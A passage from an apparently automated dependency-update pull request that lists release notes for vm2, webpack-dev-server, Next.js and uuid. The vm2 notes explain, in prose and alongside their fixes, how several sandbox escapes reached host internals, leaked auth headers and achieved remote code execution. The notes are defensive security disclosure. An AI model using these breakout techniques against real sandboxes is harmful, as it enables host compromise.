\u003ccode\u003e-http\u003c/code\u003e/\u003ccode\u003e-https\u003c/code\u003e/\u003ccode\u003e-net\u003c/code\u003e/\u003ccode\u003e-tls\u003c/code\u003e exclusions were used — SSRF-class capability bypass (CVSS 8.6). Structural fix in \u003ccode\u003elib/builtin.js\u003c/code\u003e: \u003ccode\u003eBUILTIN_MODULES\u003c/code\u003e filter now excludes any name starting with \u003ccode\u003e_\u003c/code\u003e, so \u003ccode\u003e'*'\u003c/code\u003e expands only to documented public builtins; explicit opt-in, \u003ccode\u003emock\u003c/code\u003e, and \u003ccode\u003eoverride\u003c/code\u003e paths remain functional. See ATTACKS.md Category 34 and \u003ccode\u003etest/ghsa/GHSA-r9pm-gxmw-wv6p/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9g8x-92q2-p28f\u003c/strong\u003e — NodeVM builtin allowlist surfaced four process-wide observability builtins (\u003ccode\u003ediagnostics_channel\u003c/code\u003e, \u003ccode\u003easync_hooks\u003c/code\u003e, \u003ccode\u003eperf_hooks\u003c/code\u003e, \u003ccode\u003ev8\u003c/code\u003e) that read state from the entire host process rather than the sandbox: HTTP \u003ccode\u003eIncomingMessage\u003c/code\u003e headers (incl. auth tokens) via \u003ccode\u003ediagnostics_channel.subscribe\u003c/code\u003e, embedder \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e context via \u003ccode\u003easync_hooks.executionAsyncResource\u003c/code\u003e, embedder \u003ccode\u003eperformance.mark\u003c/code\u003e labels via \u003ccode\u003eperf_hooks\u003c/code\u003e, and the full V8 heap via \u003ccode\u003ev8.getHeapSnapshot\u003c/code\u003e / \u003ccode\u003ev8.queryObjects\u003c/code\u003e. Fix in \u003ccode\u003elib/builtin.js\u003c/code\u003e: extends \u003ccode\u003eDANGEROUS_BUILTINS\u003c/code\u003e with the four names, reusing the existing two-layer enforcement (\u003ccode\u003eBUILTIN_MODULES\u003c/code\u003e filter + \u003ccode\u003eaddDefaultBuiltin\u003c/code\u003e rejection, family-prefix and \u003ccode\u003enode:\u003c/code\u003e-normalised via \u003ccode\u003eisDangerousBuiltin\u003c/code\u003e). \u003ccode\u003emock\u003c/code\u003e/\u003ccode\u003eoverride\u003c/code\u003e escape hatches preserved. See ATTACKS.md Category 35 and \u003ccode\u003etest/ghsa/GHSA-9g8x-92q2-p28f/\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eUpgrade notes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eIf you constructed \u003ccode\u003eNodeVM({ nesting: \u0026lt;truthy\u0026gt; })\u003c/code\u003e without an explicit \u003ccode\u003erequire\u003c/code\u003e config object\u003c/strong\u003e, \u003ccode\u003enew NodeVM(...)\u003c/code\u003e now throws (GHSA-m4wx-m65x-ghrr). This covers every shape that previously silently produced a \u003ccode\u003evm2\u003c/code\u003e-only resolver: omitting \u003ccode\u003erequire\u003c/code\u003e entirely, or setting it to any falsy value (\u003ccode\u003efalse\u003c/code\u003e/\u003ccode\u003eundefined\u003c/code\u003e/\u003ccode\u003enull\u003c/code\u003e/\u003ccode\u003e0\u003c/code\u003e/\u003ccode\u003e''\u003c/code\u003e) or any truthy non-object value (\u003ccode\u003etrue\u003c/code\u003e/number/string/symbol/function); and also any truthy \u003ccode\u003enesting\u003c/code\u003e value, not only \u003ccode\u003enesting: true\u003c/code\u003e (\u003ccode\u003e1\u003c/code\u003e/\u003ccode\u003e'yes'\u003c/code\u003e/\u003ccode\u003e{}\u003c/code\u003e/\u003ccode\u003e[]\u003c/code\u003e/function). Either drop \u003ccode\u003enesting\u003c/code\u003e, or pass an explicit \u003ccode\u003erequire\u003c/code\u003e config object (e.g. \u003ccode\u003erequire: { builtin: [] }\u003c/code\u003e) to acknowledge that vm2 will be requireable from inside the sandbox. The error message is actionable and links to the README hardening section.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.3]\u003c/h2\u003e\n\u003cp\u003ePatch release — no API changes.\u003c/p\u003e\n\u003ch3\u003eSecurity fix\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-248r-7h7q-cr24\u003c/strong\u003e — async generator \u003ccode\u003eyield*\u003c/code\u003e-return thenable exception capture. Calling \u003ccode\u003ei.return(thenable)\u003c/code\u003e on an async generator delegating to a no-\u003ccode\u003ereturn\u003c/code\u003e inner iterator let V8's \u003ccode\u003ePromiseResolveThenableJob\u003c/code\u003e capture synchronous throws from the thenable's \u003ccode\u003e.then\u003c/code\u003e and surface them to sandbox code as iterator results — bypassing both the transformer's \u003ccode\u003ecatch\u003c/code\u003e instrumentation and the \u003ccode\u003eglobalPromise.prototype.then\u003c/code\u003e rejection sanitiser. Two-layer defense on \u003ccode\u003e%AsyncGeneratorPrototype%.next/.return/.throw\u003c/code\u003e in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e: every iterator-result promise routes value and rejection through \u003ccode\u003ehandleException\u003c/code\u003e, and every thenable argument is replaced with a sandbox-realm wrapper whose \u003ccode\u003e.then\u003c/code\u003e is a fixed \u003ccode\u003esafeThen\u003c/code\u003e that sanitises sync throws and recursively re-wraps any nested thenable handed to \u003ccode\u003eresolve(...)\u003c/code\u003e. When \u003ccode\u003esafeThen\u003c/code\u003e reads \u003ccode\u003evalue.then\u003c/code\u003e and it is non-function, the wrapper always resolves with a \u003ccode\u003e{__proto__: null}\u003c/code\u003e shadow so V8's re-read of \u003ccode\u003e.then\u003c/code\u003e cannot observe attacker-controlled values — closing every counting/self-replacing-getter TOCTOU variant. Trade-off: identity is not preserved for non-thenable values passed to \u003ccode\u003ei.return(x)\u003c/code\u003e. ATTACKS.md Category 29.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.2]\u003c/h2\u003e\n\u003cp\u003eThree advisories closed. Patch release — no API changes.\u003c/p\u003e\n\u003ch3\u003eSecurity fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-2cm2-m3w5-gp2f\u003c/strong\u003e — Internal state reachable via computed property access on \u003ccode\u003eglobalThis\u003c/code\u003e. The previous fix (GHSA-wp5r-2gw5-m7q7) tightened the transformer's identifier-rejection but left \u003ccode\u003eglobalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']\u003c/code\u003e and every reflective probe of the global object (bracket access, \u003ccode\u003eReflect.get\u003c/code\u003e, \u003ccode\u003eObject.getOwnPropertyDescriptor\u003c/code\u003e, \u003ccode\u003eObject.getOwnPropertyNames\u003c/code\u003e enumeration) returning the live state object — the transformer is a syntactic gate and cannot see through dynamic property keys. Structural fix: the bootstrap script (\u003ccode\u003evm.js\u003c/code\u003e's setupSandboxScript source) now declares \u003ccode\u003elet VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL\u003c/code\u003e at the script's top level, which lands the binding in the context's \u003ccode\u003e[[GlobalLexicalEnvironment]]\u003c/code\u003e — reachable as a bare identifier from every script (so transformer-emitted catch handlers still resolve), but absent from \u003ccode\u003eglobalThis\u003c/code\u003e's own-property table (so every computed-key probe returns \u003ccode\u003eundefined\u003c/code\u003e). The \u003ccode\u003edefineProperty\u003c/code\u003e install in \u003ccode\u003esetup-sandbox.js\u003c/code\u003e is removed entirely; the bootstrap IIFE assigns into the outer \u003ccode\u003elet\u003c/code\u003e instead. Supersedes GHSA-wp5r-2gw5-m7q7's identifier-only mitigation by closing the entire computed-key class. ATTACKS.md Category 27.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9vg3-4rfj-wgcm\u003c/strong\u003e — Sandbox breakout via null-proto throw / \u003ccode\u003ehandleException\u003c/code\u003e. The post-GHSA-mpf8 hardening switched \u003ccode\u003ehandleException\u003c/code\u003e and \u003ccode\u003eglobalPromise.prototype.then\u003c/code\u003e onFulfilled to wrap caught/resolved values with \u003ccode\u003ebridge.from()\u003c/code\u003e for \u0026quot;symmetry\u0026quot;. \u003ccode\u003efrom()\u003c/code\u003e builds a sandbox-side proxy whose target the bridge treats as host-realm; calling it on a sandbox-realm null-proto value (\u003ccode\u003e{__proto__: null}\u003c/code\u003e thrown or \u003ccode\u003ePromise.resolve\u003c/code\u003e-d by sandbox JS) produced a proxy whose \u003ccode\u003eset\u003c/code\u003e trap unwrapped sandbox proxies of host references (e.g. \u003ccode\u003eBuffer.prototype.inspect\u003c/code\u003e) back to their raw host originals and stored them on the underlying sandbox object — readable via the original sandbox reference and pivot to host \u003ccode\u003eFunction\u003c/code\u003e constructor → RCE. Three callsites in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e reverted to \u003ccode\u003eensureThis()\u003c/code\u003e semantics; the host-Promise rejection sanitizer composes \u003ccode\u003efrom()\u003c/code\u003e outside \u003ccode\u003ehandleException\u003c/code\u003e so the GHSA-mpf8 invariant (host null-proto rejection values must reach sandbox callbacks bridge-wrapped) is preserved. ATTACKS.md Category 26.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9qj6-qjgg-37qq\u003c/strong\u003e — sandbox breakout via the species-defense helper \u003ccode\u003eneutralizeArraySpeciesBatch\u003c/code\u003e. The helper appended saved-state records to a fresh \u003ccode\u003e[]\u003c/code\u003e literal that — being allocated by the sandbox-side bridge closure — inherited sandbox \u003ccode\u003eArray.prototype\u003c/code\u003e. A sandbox-installed setter on \u003ccode\u003eArray.prototype[N]\u003c/code\u003e therefore captured the next \u003ccode\u003esaved[saved.length] = c\u003c/code\u003e write and exposed \u003ccode\u003ec.arr\u003c/code\u003e (a host-realm proxy) directly to attacker code, leading to host \u003ccode\u003eFunction\u003c/code\u003e extraction and RCE. Fixed in \u003ccode\u003elib/bridge.js\u003c/code\u003e by writing every saved-state entry through \u003ccode\u003ethisReflectDefineProperty\u003c/code\u003e so the appended slot is an own data property and no \u003ccode\u003eArray.prototype[N]\u003c/code\u003e setter is ever invoked while the bridge holds raw saved state. ATTACKS.md gains a new Defense Invariant (\u0026quot;Bridge-internal containers must not invoke sandbox code\u0026quot;) codifying the cross-cutting principle.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.1]\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/7a1f5100b96f48d34e0fe104ab37c0acc5944f92\"\u003e\u003ccode\u003e7a1f510\u003c/code\u003e\u003c/a\u003e Fix .node typo (\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/568\"\u003e#568\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/fac7fb43ad1d9765ed42734410f069b6ee17e34e\"\u003e\u003ccode\u003efac7fb4\u003c/code\u003e\u003c/a\u003e fix: test compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/2da83ed2f4b4e174ed086e8a53d1c5da11609d91\"\u003e\u003ccode\u003e2da83ed\u003c/code\u003e\u003c/a\u003e fix(\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/567\"\u003e#567\u003c/a\u003e): restore array iteration on vm.freeze()'d host arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/51cc4bc2e6e12439b306f0266b6171e3805a2f38\"\u003e\u003ccode\u003e51cc4bc\u003c/code\u003e\u003c/a\u003e fix(\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/566\"\u003e#566\u003c/a\u003e): restore util.inspect output on Node 26+\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/27354d56563b0acb54eb9dd92edbc167612b9d4b\"\u003e\u003ccode\u003e27354d5\u003c/code\u003e\u003c/a\u003e fix: test compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/59ccba9a508e96acb486e2c04666b998f95e17e1\"\u003e\u003ccode\u003e59ccba9\u003c/code\u003e\u003c/a\u003e feat: add merge-fix skill for integrating confirmed vulnerability fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/86ab819f202c3a8dad88cef5705f2e416c5188d7\"\u003e\u003ccode\u003e86ab819\u003c/code\u003e\u003c/a\u003e fix(GHSA-m4wx-m65x-ghrr): widen NESTING_OVERRIDE guard to all input shapes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/e1c48fce05189f48e71efbd32af0754efa4066bb\"\u003e\u003ccode\u003ee1c48fc\u003c/code\u003e\u003c/a\u003e fix(GHSA-9g8x-92q2-p28f): deny process-wide observability builtins in NodeVM\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/436053e30eecbabd487e2fd2959c137ac34e2bb1\"\u003e\u003ccode\u003e436053e\u003c/code\u003e\u003c/a\u003e fix(GHSA-r9pm-gxmw-wv6p): exclude underscored builtins from NodeVM '*' wildca...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/a1ed47a98d1cc36cb48c0d566d55889688e0b59b\"\u003e\u003ccode\u003ea1ed47a\u003c/code\u003e\u003c/a\u003e fix(GHSA-rp36-8xq3-r6c4): close NodeVM builtin denylist bypass via process/in...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/patriksimek/vm2/compare/3.9.19...v3.11.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for vm2 since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 4.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.15.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v4.15.2\"\u003e4.15.2\u003c/a\u003e (2024-03-20)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e bump webpack-dev-middleware (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/411620997594d24cd1f788e8533a5c6fa2736143\"\u003e4116209\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/v4.15.2/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v4.15.2\"\u003e4.15.2\u003c/a\u003e (2024-03-20)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e bump webpack-dev-middleware (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/411620997594d24cd1f788e8533a5c6fa2736143\"\u003e4116209\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/11bfcde1cbb291c349a61332937618685a98dd74\"\u003e\u003ccode\u003e11bfcde\u003c/code\u003e\u003c/a\u003e chore(release): 4.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/411620997594d24cd1f788e8533a5c6fa2736143\"\u003e\u003ccode\u003e4116209\u003c/code\u003e\u003c/a\u003e fix(security): bump webpack-dev-middleware\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v4.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 14.2.28 to 15.5.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev15.5.18\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - Incomplete Fix Follow-Up\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.16\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.15\u003c/h2\u003e\n\u003cp\u003ePlease refer the following changelogs for more information about this security release:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://vercel.com/changelog/summary-of-cve-2026-23869\"\u003ehttps://vercel.com/changelog/summary-of-cve-2026-23869\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev15.5.14\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9ff92cebcaa6ba4e7463b6fd037a8510ba9b81ec\"\u003e\u003ccode\u003e9ff92ce\u003c/code\u003e\u003c/a\u003e v15.5.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/00ebe23562bd7eb32dd78730984bfadb47138bcf\"\u003e\u003ccode\u003e00ebe23\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/62c97ab0b5825e2cbc15f6b682d8286a8dd6a038\"\u003e\u003ccode\u003e62c97ab\u003c/code\u003e\u003c/a\u003e v15.5.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/423623ae38c106273085b66946ee5bf9aab77f2c\"\u003e\u003ccode\u003e423623a\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/fa787399b38d9aa702118f9bd23a8315b9f0ecc6\"\u003e\u003ccode\u003efa78739\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36e62c6eb7813e42d409eb487f93b829f4ad77e8\"\u003e\u003ccode\u003e36e62c6\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93588\"\u003e#93588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36589b5db512b7704cdadd873cbe49b6dbcc9261\"\u003e\u003ccode\u003e36589b5\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93596\"\u003e#93596\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ad6fd4e50e5aba20b60d283c42b89273a3167ccd\"\u003e\u003ccode\u003ead6fd4e\u003c/code\u003e\u003c/a\u003e v15.5.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/79d7dff1448483f0c8f187f98887b31019f6e494\"\u003e\u003ccode\u003e79d7dff\u003c/code\u003e\u003c/a\u003e Ignore malformed CSP nonce headers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/c4f69086cc8dcbd81b1dbc321c98ea874d90d6f8\"\u003e\u003ccode\u003ec4f6908\u003c/code\u003e\u003c/a\u003e router-server: guard upgrade proxy against absolute-url SSRF (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/77\"\u003e#77\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v14.2.28...v15.5.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 10.0.0 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/releases\"\u003euuid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect 